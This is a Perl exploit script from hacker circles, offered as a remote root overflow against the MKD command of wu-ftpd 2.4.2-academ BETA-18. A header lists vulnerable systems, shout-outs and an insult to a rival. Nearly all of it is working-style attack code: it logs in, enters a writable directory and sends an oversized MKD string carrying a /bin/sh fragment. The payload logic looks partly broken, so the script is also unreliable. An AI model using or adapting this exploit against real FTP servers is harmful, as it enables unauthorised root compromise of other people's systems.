#!/usr/bin/perl

# ABOUT:
#  wu-ftpd.pl v1 by ben-z !! wu-2.4.2-academ[BETA-18](1) remote overflow.
#  exploits a flaw in the MKD function of wu-ftpd to remotely compromise
#  a system and obtain root access. below is a list of affected systems.
#
# System              | Description                  | Vulnerable
# --------------------------------------------------------------------
# Redhat 5.2          | installed by default         | yes
# Caldera 1.3         | installed by default         | yes
# *bsd		    | usually installed	           | yes
# --------------------------------------------------------------------
#
# THANKS:
#  #fts(2), #bitchx, #slackware, #violators @ undernet.org
#  #underground and #slackware @ irc.psychic.com
#  everyone on irc.slacknet.org, metalman, eklipz, axion, madli0n,
#  chawp, aj, magicfx, rhodie, dpad, fenix, and folk.
#
# ANTI-THANKS:
#  bXlogic your lame and everyone hates you. stop ripping my code^M

print "===================================================================\n";
print "= <wu-ftpd.pl>: brought to you by ben-z and #fts(2)\@undernet.org  =\n";
print "===================================================================\n\n";
$length=256;
$ARGC=@ARGV;
if ($ARGC <3) {
      print "<wu-ftpd.pl>: Syntax: $0 <host> <dir> <login> <pass> [offset(256)]\n";
	print "-- Host: address of wu-ftpd server to own --\n";
      print "-- Directory: the full path of a directory <login> has write access to\n";
	print "-- Login: ftp login name (Anonymous if you dont have an account) --\n";
	print "-- Password: ftp password (if Anonymous, use an email address)\n";
	print "-- Offset: length of string to use (the default should work)\n";
	exit;
}
use Socket;


my($remote,$port,$iaddr,$paddr,$proto,$line);
$remote=$ARGV[0];
$port = "21";
$rdir=$ARGV[1];
$rlogin=$ARGV[2];
$rpass=$ARGV[3];
if ($ARGV[4]) {
 $length=$ARGV[4];
}
$string="?" x $length;
print "<wu-ftpd.pl>: Attempting overflow on $remote [offset: $length]\n";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";;
$msg = "USER $rlogin\n"; 
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
$msg = "PASS $rpass\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
$msg = "CWD $rdir\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
$msg = "MKD $string\Hüÿ¿Hüÿ¿bin/sh\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
send(SOCK, $msg, 0) or die "Server Error! (patched): $!";
$msg = "MKD bin\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
$msg = "CWD bin\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
$msg = "MKD sh\n";
while (<SOCK>) {
   print; 
}
print "<wu-ftpd.pl>: done. please visit http://www.slacknet.org\n";   
exit;